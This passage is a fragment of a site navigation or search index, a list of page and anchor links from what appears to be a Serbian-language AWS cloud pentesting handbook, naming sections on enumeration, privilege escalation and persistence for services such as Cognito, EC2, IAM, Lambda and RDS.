ebuild-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#aws---cognito-enum","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#cognito","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#user-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#identity-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#identity-pools---neautentifikovana-enumeracija","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#user-pools---neautentifikovana-enumeracija","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#privesc","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#neautentifikovani-pristup","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#persistencija","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#cognito-identity-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#osnovne-informacije","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#cognito-sync","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#tools-for-pentesting","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#pristup-iam-rolama","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#neautentifikovani","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#poboljšan-vs-osnovni-tok-autentifikacije","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#autentifikovani","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#cognito-user-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#osnovne-informacije","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#potencijalni-napadi","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#alati-za-pentesting","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#registracija","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#verifikacija-registracije","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#eskalacija-privilegija--ažuriranje-atributa","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#oporavakpromena-lozinke","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#autentifikacija","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#admin_no_srp_auth--admin_user_password_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user_password_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user_srp_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#refresh_token_auth--refresh_token","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#custom_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#dodatna-sigurnost","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#napredna-sigurnost","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#mfa-zapamti-uređaj","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#iam-uloge-grupa-korisničkog-bazena","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#aws---datapipeline-codepipeline--codecommit-enum","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#datapipeline","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#privesc","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#codepipeline","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#privesc-1","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#codecommit","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration-2","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#reference","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#aws---directory-services--workdocs-enum","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#directory-services","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#options","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#lab","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#prijava","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#eskalacija-privilegija","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#postojanost","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#korišćenje-ad-korisnika","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#deljenje-ad-od-žrtve-do-napadača","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#deljenje-ad-od-napadača-do-žrtve","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#workdocs","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#enumeracija","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#aws---documentdb-enum","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#documentdb","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#nosql-injection","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#documentdb-1","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#aws---dynamodb-enum","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#dynamodb","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#osnovne-informacije","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#enkripcija","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#rezervne-kopije-i-izvoz-u-s3","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#gui","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#enumeracija","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#neautentifikovani-pristup","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#post-eksploatacija","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#perzistencija","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#dynamodb-injekcija","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#sql-injekcija","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#nosql-injekcija","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#raw-json-injection","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#property-injection","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#aws---ec2-ebs-elb-ssm-vpc--vpn-enum","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#vpc--networking","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ec2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#instance-profiles","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#metadata-endpoint","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#neautentifikovani-pristup","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#privesc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#post-eksploatacija","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ebs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#razlika-ami--ebs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#privesc-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ssm","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeracija","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#privesc-2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#elb","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Šabloni-za-pokretanje-i-grupe-za-automatsko-skaliranje","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeracija-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#nitro","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#lokalna-enumeracija","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#reference","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#aws---nitro-enum","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#osnovne-informacije","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enklave","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#instalacija-nitro-enclave-cli","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclave-images","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#pokreni-sliku","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#enumerate-enclaves","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#terminate-enclaves","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsocks","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-serverlistener","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-klijent","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-proxy","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclave-atestacija--kms","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#pcr-bypass","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#reference","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#aws---vpc--networking-osnovne-informacije","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#aws-mrežno-ukratko","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#podmreže","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#tabele-rute","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#acls","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#grupe-sigurnosti","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#elastične-ip-adrese","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#povezivanje-između-podmreža","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpc-peering","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpc-tokovi-logova","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#osnovne-komponente-aws-vpn-a","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#site-to-site-vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#klijent-vpn","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#aws---ecr-enum","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#aws---ecr-enum-1","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#ecr","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#reference","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#aws---ecs-enum","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#ecs","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#osnovne-informacije","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#osetljivi-podaci-u-definicijama-zadataka","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#enumeracija","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#neautentifikovani-pristup","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#povećanje-privilegija","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#post-eksploatacija","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#postojanost","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#aws---eks-enum","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#eks","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#reference","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#aws---elastic-beanstalk-enum","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#aplikacija-i-okruženja","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#2-tipa-okruženja","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#bezbednost","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#izloženost","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#enumeracija","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#neautentifikovani-pristup","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#persistencija","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#povišenje-privilegija","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#post-eksploatacija","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#aws---elasticache","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#elasticache","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#privesc-todo","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#aws---emr-enum","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#emr","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#aws---efs-enum","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#efs","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#osnovne-informacije","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#mrežni-pristup","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#enumeracija","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#montiraj-efs","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#iam-access","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#access-points","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#efs-ip-adresa","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#persistence","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#aws---eventbridge-scheduler-enum","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#eventbridge-scheduler","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#eventbridge-scheduler-1","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#tipovi-rasporeda","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#ciljevi","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#privesc","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#aws---kinesis-data-firehose-enum","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#kinesis-data-firehose","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#post-exploitation--defense-bypass","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehosedeletedeliverystream","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehoseupdatedestination","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehoseputrecord--firehoseputrecordbatch","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#reference","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#aws---iam-identity-center--sso-enum","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#dozvola-brute-force","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#neautentifikovani-pristup","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#eskalacija-privilegija","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-post-eksploatacija","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-persistencija","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-identitet-centar","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#povezivanje-putem-sso-sa-cli","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#enumeracija","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#lokalna-enumeracija","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#neautentifikovani-pristup-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#eskalacija-privilegija-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#post-eksploatacija","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#postojanost","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#aws---kms-enum","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#kms---usluga-upravljanja-ključevima","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#politike-ključeva","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#administratori-ključeva","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#rotacija-cmk-ova","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#druge-relevantne-kms-informacije","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#enumeracija","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#aws---lambda-enum","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-aliases-weights","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#resource-policies","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-database-proxies","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-efs-filesystems","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-layers","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-extensions","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#pozivanje-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#neautentifikovani-pristup","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#post-eksploatacija","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#persistencija","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#reference","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#aws---lightsail-enum","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#aws---lightsail","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#analiza-snimaka","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#metapodaci","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#post-eksploatacija","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#persistencija","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#amazon-macie","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#uvod","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#listing-findings-with-aws-console","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#revealing-secret","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---mq-enum","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#amazon-mq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#uvod-u-posrednike-poruka","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---rabbitmq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---activemq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#enumeracija","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#neautentifikovani-pristup","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#persistencija","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#reference","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#aws---msk-enum","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#amazon-msk","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#tipovi","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#kafka-iam-pristup-u-serverless","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#neautentifikovani-pristup","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#persistencija","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#reference","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#aws---organizacije-enum","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#osnovne-informacije","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#reference","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#aws---redshift-enum","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#amazon-redshift","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#kms","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#cloudhsm","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#aws---relational-database-rds-enum","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#osnovne-informacije","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#akreditivi","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#autentifikacija","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#javni-pristup-i-vpc","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#enkripcija","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#enumeracija","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#neautentifikovani-pristup","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#post-eksploatacija","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#persistencija","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#sql-injekcija","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#aws---route53-enum","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#route-53","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#ip-based-routing","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#aws---secrets-manager-enum","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#aws-secrets-manager","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#aws---ses-enum","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#osnovne-informacije","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#smtp-korisnik","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#enumeracija","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#post-eksploatacija","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#aws---sns-enum","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#sns","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#razlika-sa-sqs","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#enumeracija","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#reference","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#aws---sqs-enum","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#sqs","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#reference","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#aws---s3-athena--glacier-enum","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3","pentesting-cloud/aws-security/aws-s